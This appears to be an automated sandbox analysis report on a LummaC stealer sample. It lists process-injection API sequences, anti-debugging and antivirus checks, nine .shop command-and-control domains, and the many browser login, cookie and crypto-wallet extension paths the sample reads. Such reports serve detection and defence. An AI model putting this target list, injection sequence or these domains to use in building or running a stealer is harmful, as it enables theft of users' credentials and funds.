Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006C9AC7 SetUnhandledExceptionFilter,	3_2_006C9AC7
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006D1AC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_006D1AC0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006C9AD3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_006C9AD3
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006C9713 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_006C9713

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 0_2_006F019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_006F019E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Memory written: C:\Users\user\Desktop\UhsjR3ZFTD.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Process created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"

Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_00438040 cpuid

3_2_00438040

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	0_2_006D6065
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	0_2_006DA8F8
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_006DA9A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	0_2_006DABF3
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	0_2_006DAC60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	0_2_006D656D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	0_2_006DAD35
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	0_2_006DAD80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_006DAE27
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_006DA6A7
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	0_2_006DAF2D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	3_2_006D6065
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	3_2_006DA8F8
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_006DA9A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	3_2_006DABF3
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	3_2_006DAC60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	3_2_006D656D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: EnumSystemLocalesW,	3_2_006DAD35
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	3_2_006DAD80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_006DAE27
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_006DA6A7
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: GetLocaleInfoW,	3_2_006DAF2D

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 0_2_006CA395 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006CA395

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: UhsjR3ZFTD.exe, 00000003.00000003.2191841142.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: UhsjR3ZFTD.exe PID: 3960, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z"

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
